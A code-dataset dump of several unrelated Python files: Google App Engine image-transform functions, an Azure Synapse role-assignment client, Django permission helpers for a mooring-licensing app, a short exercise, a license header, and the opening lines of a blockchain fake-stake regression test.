return image.execute_transforms(output_encoding=output_encoding)
def rotate(image_data, degrees, output_encoding=PNG):
"""Rotate a given image a given number of degrees clockwise.
Args:
image_data: str, source image data.
degrees: value from ROTATE_DEGREE_VALUES.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
TypeError when degrees is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given degrees.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.rotate(degrees)
return image.execute_transforms(output_encoding=output_encoding)
def horizontal_flip(image_data, output_encoding=PNG):
"""Flip the image horizontally.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.horizontal_flip()
return image.execute_transforms(output_encoding=output_encoding)
def vertical_flip(image_data, output_encoding=PNG):
"""Flip the image vertically.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.vertical_flip()
return image.execute_transforms(output_encoding=output_encoding)
def crop(image_data, left_x, top_y, right_x, bottom_y, output_encoding=PNG):
"""Crop the given image.
The four arguments are the scaling numbers to describe the bounding box
which will crop the image. The upper left point of the bounding box will
be at (left_x*image_width, top_y*image_height) the lower right point will
be at (right_x*image_width, bottom_y*image_height).
Args:
image_data: str, source image data.
left_x: float value between 0.0 and 1.0 (inclusive).
top_y: float value between 0.0 and 1.0 (inclusive).
right_x: float value between 0.0 and 1.0 (inclusive).
bottom_y: float value between 0.0 and 1.0 (inclusive).
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.crop(left_x, top_y, right_x, bottom_y)
return image.execute_transforms(output_encoding=output_encoding)
def im_feeling_lucky(image_data, output_encoding=PNG):
"""Automatically adjust image levels.
This is similar to the "I'm Feeling Lucky" button in Picasa.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.im_feeling_lucky()
return image.execute_transforms(output_encoding=output_encoding)
def composite(inputs, width, height, color=0, output_encoding=PNG, quality=None):
"""Composite one or more images onto a canvas.
Args:
inputs: a list of tuples (image_data, x_offset, y_offset, opacity, anchor)
where
image_data: str, source image data.
x_offset: x offset in pixels from the anchor position
y_offset: y offset in piyels from the anchor position
opacity: opacity of the image specified as a float in range [0.0, 1.0]
anchor: anchoring point from ANCHOR_POINTS. The anchor point of the image
is aligned with the same anchor point of the canvas. e.g. TOP_RIGHT would
place the top right corner of the image at the top right corner of the
canvas then apply the x and y offsets.
width: canvas width in pixels.
height: canvas height in pixels.
color: canvas background color encoded as a 32 bit unsigned int where each
color channel is represented by one byte in order ARGB.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
quality: A value between 1 and 100 to specify the quality of the
encoding. This value is only used for JPEG quality control.
Returns:
str, image data of the composited image.
Raises:
TypeError If width, height, color, x_offset or y_offset are not of type
int or long or if opacity is not a float
BadRequestError If more than MAX_TRANSFORMS_PER_REQUEST compositions have
been requested, if the canvas width or height is greater than 4000 or less
than or equal to 0, if the color is invalid or if for any composition
option, the opacity is outside the range [0,1] or the anchor is invalid.
"""
if (not isinstance(width, (int, long)) or
not isinstance(height, (int, long)) or
not isinstance(color, (int, long))):
raise TypeError("Width, height and color must be integers.")
if output_encoding not in OUTPUT_ENCODING_TYPES:
raise BadRequestError("Output encoding type '%s' not in recognized set "
"%s" % (output_encoding, OUTPUT_ENCODING_TYPES))
if quality is not None:
if not isinstance(quality, (int, long)):
raise TypeError("Quality must be an integer.")
if quality > 100 or quality < 1:
raise BadRequestError("Quality must be between 1 and 100.")
if not inputs:
raise BadRequestError("Must provide at least one input")
if len(inputs) > MAX_COMPOSITES_PER_REQUEST:
raise BadRequestError("A maximum of %d composition operations can be"
"performed in a single request" %
MAX_COMPOSITES_PER_REQUEST)
if width <= 0 or height <= 0:
raise BadRequestError("Width and height must be > 0.")
if width > 4000 or height > 4000:
raise BadRequestError("Width and height must be <= 4000.")
if color > 0xffffffff or color < 0:
raise BadRequestError("Invalid color")
if color >= 0x80000000:
color -= 0x100000000
image_map = {}
request = images_service_pb.ImagesCompositeRequest()
response = images_service_pb.ImagesTransformResponse()
for (image, x, y, opacity, anchor) in inputs:
if not image:
raise BadRequestError("Each input must include an image")
if (not isinstance(x, (int, long)) or
not isinstance(y, (int, long)) or
not isinstance(opacity, (float))):
raise TypeError("x_offset, y_offset must be integers and opacity must"
"be a float")
if x > 4000 or x < -4000:
raise BadRequestError("xOffsets must be in range [-4000, 4000]")
if y > 4000 or y < -4000:
raise BadRequestError("yOffsets must be in range [-4000, 4000]")
if opacity < 0 or opacity > 1:
raise BadRequestError("Opacity must be in the range 0.0 to 1.0")
if anchor not in ANCHOR_TYPES:
raise BadRequestError("Anchor type '%s' not in recognized set %s" %
(anchor, ANCHOR_TYPES))
if image not in image_map:
image_map[image] = request.image_size()
if isinstance(image, Image):
image._set_imagedata(request.add_image())
else:
request.add_image().set_content(image)
option = request.add_options()
option.set_x_offset(x)
option.set_y_offset(y)
option.set_opacity(opacity)
option.set_anchor(anchor)
option.set_source_index(image_map[image])
request.mutable_canvas().mutable_output().set_mime_type(output_encoding)
request.mutable_canvas().set_width(width)
request.mutable_canvas().set_height(height)
request.mutable_canvas().set_color(color)
if ((output_encoding == JPEG) and
(quality is not None)):
request.mutable_canvas().mutable_output().set_quality(quality)
try:
apiproxy_stub_map.MakeSyncCall("images",
"Composite",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.BAD_TRANSFORM_DATA):
raise BadRequestError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.UNSPECIFIED_ERROR):
raise TransformationError()
else:
raise Error()
return response.image().content()
def histogram(image_data):
"""Calculates the histogram of the given image.
Args:
image_data: str, source image data.
Returns: 3 256-element lists containing the number of occurences of each
value of each color in the order RGB.
Raises:
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
Error when something unknown, but bad, happens.
"""
image = Image(image_data)
return image.histogram()
IMG_SERVING_SIZES_LIMIT = 1600
IMG_SERVING_SIZES = [
32, 48, 64, 72, 80, 90, 94, 104, 110, 120, 128, 144,
150, 160, 200, 220, 288, 320, 400, 512, 576, 640, 720,
800, 912, 1024, 1152, 1280, 1440, 1600]
IMG_SERVING_CROP_SIZES = [32, 48, 64, 72, 80, 104, 136, 144, 150, 160]
def get_serving_url(blob_key,
size=None,
crop=False):
"""Obtain a url that will serve the underlying image.
This URL is served by a high-performance dynamic image serving infrastructure.
This URL format also allows dynamic resizing and crop with certain
restrictions. To get dynamic resizing and cropping, specify size and crop
arguments, or simply append options to the end of the default url obtained via
this call. Here is an example:
get_serving_url -> "http://lh3.ggpht.com/SomeCharactersGoesHere"
To get a 32 pixel sized version (aspect-ratio preserved) simply append
"=s32" to the url:
"http://lh3.ggpht.com/SomeCharactersGoesHere=s32"
To get a 32 pixel cropped version simply append "=s32-c":
"http://lh3.ggpht.com/SomeCharactersGoesHere=s32-c"
Available sizes are any interger in the range [0, 1600] and is available as
IMG_SERVING_SIZES_LIMIT.
Args:
size: int, size of resulting images
crop: bool, True requests a cropped image, False a resized one.
Returns:
str, a url
Raises:
BlobKeyRequiredError: when no blobkey was specified in the ctor.
UnsupportedSizeError: when size parameters uses unsupported sizes.
BadRequestError: when crop/size are present in wrong combination.
"""
if not blob_key:
raise BlobKeyRequiredError("A Blobkey is required for this operation.")
if crop and not size:
raise BadRequestError("Size should be set for crop operation")
if size and (size > IMG_SERVING_SIZES_LIMIT or size < 0):
raise UnsupportedSizeError("Unsupported size")
request = images_service_pb.ImagesGetUrlBaseRequest()
response = images_service_pb.ImagesGetUrlBaseResponse()
request.set_blob_key(blob_key)
try:
apiproxy_stub_map.MakeSyncCall("images",
"GetUrlBase",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
else:
raise Error()
url = response.url()
if size:
url += "=s%s" % size
if crop:
url += "-c"
return url
| 34.9909
| 81
| 0.683408
|
cb86844490805357512bf0f15acfbb8e8a019e8e
| 225
|
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 24/24.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101
|
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
50-Python-Exercises/Exercises/Exercise 24/24.py
|
kuwarkapur/Hacktoberfest-2022
|
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
|
[
"MIT"
] | 4
|
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
50-Python-Exercises/Exercises/Exercise 24/24.py
|
kuwarkapur/Hacktoberfest-2022
|
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
|
[
"MIT"
] | 38
|
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
#Complete the script so it prints out the expected output
d = dict(a = list(range(1, 11)), b = list(range(11, 21)), c = list(range(21, 31)))
print(d.items())
for key, value in d.items():
print(key, "has value", value)
| 25
| 82
| 0.64
|
bfe01c3332b83459fe6d42bc4931ef5ad2855b92
| 633
|
py
|
Python
|
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2007-2015 UShareSoft SAS, All rights reserved
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
| 45.214286
| 78
| 0.731438
|
020843088f6293c261fb21ef6b97446c7e3a4e6f
| 20,523
|
py
|
Python
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class AccessControlClientOperationsMixin(object):
def get_role_definitions(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.RolesListResponse"]
"""List roles.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RolesListResponse or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.synapse.accesscontrol.models.RolesListResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolesListResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_role_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('RolesListResponse', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorContract, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_role_definitions.metadata = {'url': '/rbac/roles'} # type: ignore
def get_role_definition_by_id(
self,
role_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SynapseRole"
"""Get role by role Id.
:param role_id: Synapse Built-In Role Id.
:type role_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynapseRole, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.SynapseRole
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynapseRole"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_definition_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleId': self._serialize.url("role_id", role_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynapseRole', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_role_definition_by_id.metadata = {'url': '/rbac/roles/{roleId}'} # type: ignore
def create_role_assignment(
self,
create_role_assignment_options, # type: "_models.RoleAssignmentOptions"
**kwargs # type: Any
):
# type: (...) -> "_models.RoleAssignmentDetails"
"""Create role assignment.
:param create_role_assignment_options: Details of role id and object id.
:type create_role_assignment_options: ~azure.synapse.accesscontrol.models.RoleAssignmentOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RoleAssignmentDetails, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.RoleAssignmentDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RoleAssignmentDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_role_assignment.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(create_role_assignment_options, 'RoleAssignmentOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('RoleAssignmentDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_role_assignment.metadata = {'url': '/rbac/roleAssignments'} # type: ignore
def get_role_assignments(
self,
role_id=None, # type: Optional[str]
principal_id=None, # type: Optional[str]
continuation_token_parameter=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> List["_models.RoleAssignmentDetails"]
"""List role assignments.
:param role_id: Synapse Built-In Role Id.
:type role_id: str
:param principal_id: Object ID of the AAD principal or security-group.
:type principal_id: str
:param continuation_token_parameter: Continuation token.
:type continuation_token_parameter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of RoleAssignmentDetails, or the result of cls(response)
:rtype: list[~azure.synapse.accesscontrol.models.RoleAssignmentDetails]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.RoleAssignmentDetails"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_assignments.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if role_id is not None:
query_parameters['roleId'] = self._serialize.query("role_id", role_id, 'str')
if principal_id is not None:
query_parameters['principalId'] = self._serialize.query("principal_id", principal_id, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if continuation_token_parameter is not None:
header_parameters['x-ms-continuation'] = self._serialize.header("continuation_token_parameter", continuation_token_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
deserialized = self._deserialize('[RoleAssignmentDetails]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_role_assignments.metadata = {'url': '/rbac/roleAssignments'} # type: ignore
def get_role_assignment_by_id(
self,
role_assignment_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.RoleAssignmentDetails"
"""Get role assignment by role assignment Id.
:param role_assignment_id: The ID of the role assignment.
:type role_assignment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RoleAssignmentDetails, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.RoleAssignmentDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RoleAssignmentDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_assignment_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleAssignmentId': self._serialize.url("role_assignment_id", role_assignment_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('RoleAssignmentDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_role_assignment_by_id.metadata = {'url': '/rbac/roleAssignments/{roleAssignmentId}'} # type: ignore
def delete_role_assignment_by_id(
self,
role_assignment_id, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete role assignment by role assignment Id.
:param role_assignment_id: The ID of the role assignment.
:type role_assignment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.delete_role_assignment_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleAssignmentId': self._serialize.url("role_assignment_id", role_assignment_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_role_assignment_by_id.metadata = {'url': '/rbac/roleAssignments/{roleAssignmentId}'} # type: ignore
def get_caller_role_assignments(
self,
**kwargs # type: Any
):
# type: (...) -> List[str]
"""List role assignments of the caller.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_caller_role_assignments.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_caller_role_assignments.metadata = {'url': '/rbac/getMyAssignedRoles'} # type: ignore
| 46.222973
| 144
| 0.655411
|
4bb9be3e8038b885810a8d692e4f35e6bec65ccd
| 2,118
|
py
|
Python
|
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | null | null | null |
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | 2
|
2021-03-05T06:48:11.000Z
|
2021-03-26T08:14:17.000Z
|
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | 15
|
2021-03-02T01:40:12.000Z
|
2022-02-15T08:26:09.000Z
|
from __future__ import unicode_literals
from ledger.accounts.models import EmailUser
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
def belongs_to(user, group_name):
"""
Check if the user belongs to the given group.
:param user:
:param group_name:
:return:
"""
return user.groups.filter(name=group_name).exists()
def is_model_backend(request):
# Return True if user logged in via single sign-on (i.e. an internal)
return 'ModelBackend' in request.session.get('_auth_user_backend')
def is_email_auth_backend(request):
# Return True if user logged in via social_auth (i.e. an external user signing in with a login-token)
return 'EmailAuth' in request.session.get('_auth_user_backend')
def is_mooringlicensing_admin(request):
#logger.info('settings.ADMIN_GROUP: {}'.format(settings.ADMIN_GROUP))
return request.user.is_authenticated() and is_model_backend(request) and in_dbca_domain(request) and (belongs_to(request.user, settings.ADMIN_GROUP))
def in_dbca_domain(request):
user = request.user
domain = user.email.split('@')[1]
if domain in settings.DEPT_DOMAINS:
if not user.is_staff:
# hack to reset department user to is_staff==True, if the user logged in externally (external departmentUser login defaults to is_staff=False)
user.is_staff = True
user.save()
return True
return False
def is_in_organisation_contacts(request, organisation):
return request.user.email in organisation.contacts.all().values_list('email', flat=True)
def is_departmentUser(request):
return request.user.is_authenticated() and is_model_backend(request) and in_dbca_domain(request)
def is_customer(request):
# return request.user.is_authenticated() and is_email_auth_backend(request)
return request.user.is_authenticated() and (is_model_backend(request) or is_email_auth_backend(request))
def is_internal(request):
return is_departmentUser(request)
def get_all_officers():
return EmailUser.objects.filter(groups__name='Commercial Operator Admin')
| 37.821429
| 154
| 0.752597
|
e5aac0dc5b07eb1018cf4c7046cae715f8f4b3ff
| 4,022
|
py
|
Python
|
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | null | null | null |
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | null | null | null |
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | 1
|
2022-02-10T12:39:58.000Z
|
2022-02-10T12:39:58.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a zPoS block where the coinstake input is a zerocoin spend
of an already spent coin.
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from fake_stake.base_test import Agrarian_FakeStakeTest
class zPoSFakeStake(Agrarian_FakeStakeTest):
def run_test(self):
self.description = "Covers the scenario of a zPoS block where the coinstake input is a zerocoin spend of an already spent coin."
self.init_test()
DENOM_TO_USE = 5000 # zc denomination
INITAL_MINED_BLOCKS = 321 # First mined blocks (rewards collected to mint)
